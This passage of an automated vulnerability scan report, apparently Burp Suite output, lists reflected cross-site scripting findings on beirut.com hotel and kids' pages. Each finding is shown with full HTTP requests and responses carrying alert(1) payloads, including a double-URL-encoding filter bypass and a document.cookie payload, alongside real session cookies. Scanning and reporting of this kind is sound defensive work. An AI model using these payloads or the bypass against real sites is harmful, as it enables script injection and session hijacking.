User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:43:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Hotels/3-Starsaf8c8'-alert(1)-'c8e69a03a5e';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.533. http://www.beirut.com/Hotels/3-Stars/3 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Hotels/3-Stars/3

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6bf1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e397b3f7e710 was submitted in the REST URL parameter 3. This input was echoed as e6bf1"><script>alert(1)</script>397b3f7e710 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Hotels/3-Stars/3e6bf1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e397b3f7e710 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:49:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=green&indexpage=Hotels&listingtype=locales.php&Types=3e6bf1"><script>alert(1)</script>397b3f7e710">
...[SNIP]...

4.534. http://www.beirut.com/Hotels/4-Stars/4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Hotels/4-Stars/4

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4223'-alert(1)-'ec523ff8242 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Hotelsd4223'-alert(1)-'ec523ff8242/4-Stars/4 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:37:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Hotelsd4223'-alert(1)-'ec523ff8242/4-Stars';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.535. http://www.beirut.com/Hotels/4-Stars/4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Hotels/4-Stars/4

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ee6a"><a>0a6867e450c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Hotels3ee6a"><a>0a6867e450c/4-Stars/4 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:30:42 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Hotels3ee6a"><a>0a6867e450c">
...[SNIP]...

4.536. http://www.beirut.com/Hotels/4-Stars/4 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Hotels/4-Stars/4

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c1ea'-alert(1)-'18dc956b014 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Hotels/4-Stars6c1ea'-alert(1)-'18dc956b014/4 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:43:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Hotels/4-Stars6c1ea'-alert(1)-'18dc956b014';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.537. http://www.beirut.com/Hotels/4-Stars/4 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Hotels/4-Stars/4

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f45f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e0d15868f5 was submitted in the REST URL parameter 3. This input was echoed as f45f3"><script>alert(1)</script>9e0d15868f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Hotels/4-Stars/4f45f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e0d15868f5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:47:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55021

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=orange&indexpage=Hotels&listingtype=locales.php&Types=4f45f3"><script>alert(1)</script>9e0d15868f5">
...[SNIP]...

4.538. http://www.beirut.com/Hotels/5-Stars/5 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Hotels/5-Stars/5

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2de3c"><a>335baf5011d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Hotels2de3c"><a>335baf5011d/5-Stars/5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:31:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Hotels2de3c"><a>335baf5011d">
...[SNIP]...

4.539. http://www.beirut.com/Hotels/5-Stars/5 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Hotels/5-Stars/5

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3ae6'-alert(1)-'e50985d440 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Hotelsb3ae6'-alert(1)-'e50985d440/5-Stars/5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:42:07 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Hotelsb3ae6'-alert(1)-'e50985d440/5-Stars';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.540. http://www.beirut.com/Hotels/5-Stars/5 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Hotels/5-Stars/5

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ded21'-alert(1)-'cc45cd03f80 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Hotels/5-Starsded21'-alert(1)-'cc45cd03f80/5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:46:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Hotels/5-Starsded21'-alert(1)-'cc45cd03f80';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.541. http://www.beirut.com/Hotels/5-Stars/5 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Hotels/5-Stars/5

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d0a5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef43175ac564 was submitted in the REST URL parameter 3. This input was echoed as 6d0a5"><script>alert(1)</script>f43175ac564 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Hotels/5-Stars/56d0a5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef43175ac564 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:50:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=magenta&indexpage=Hotels&listingtype=locales.php&Types=56d0a5"><script>alert(1)</script>f43175ac564">
...[SNIP]...

4.542. http://www.beirut.com/Index/Error [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Index/Error

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d47bf'-alert(1)-'efcc76bb9a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Indexd47bf'-alert(1)-'efcc76bb9a4/Error HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:42:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 61583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Indexd47bf'-alert(1)-'efcc76bb9a4';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.543. http://www.beirut.com/Index/Error [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Index/Error

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a3da"><a>340a7ec5325 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Index4a3da"><a>340a7ec5325/Error HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:41:56 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 61560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_footer" rel="facebox" href="/submitaListing.php?randstyle=blue&indexpage=Index4a3da"><a>340a7ec5325&listingtype=index.php&Types=">
...[SNIP]...

4.544. http://www.beirut.com/JustForKids/Educational/9-service [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /JustForKids/Educational/9-service

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c86e"><a>1669927877e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /JustForKids5c86e"><a>1669927877e/Educational/9-service HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:54:22 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="JustForKids5c86e"><a>1669927877e">
...[SNIP]...

4.545. http://www.beirut.com/JustForKids/Educational/9-service [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /JustForKids/Educational/9-service

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28d50'-alert(1)-'2b48b6f7343 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /JustForKids28d50'-alert(1)-'2b48b6f7343/Educational/9-service HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
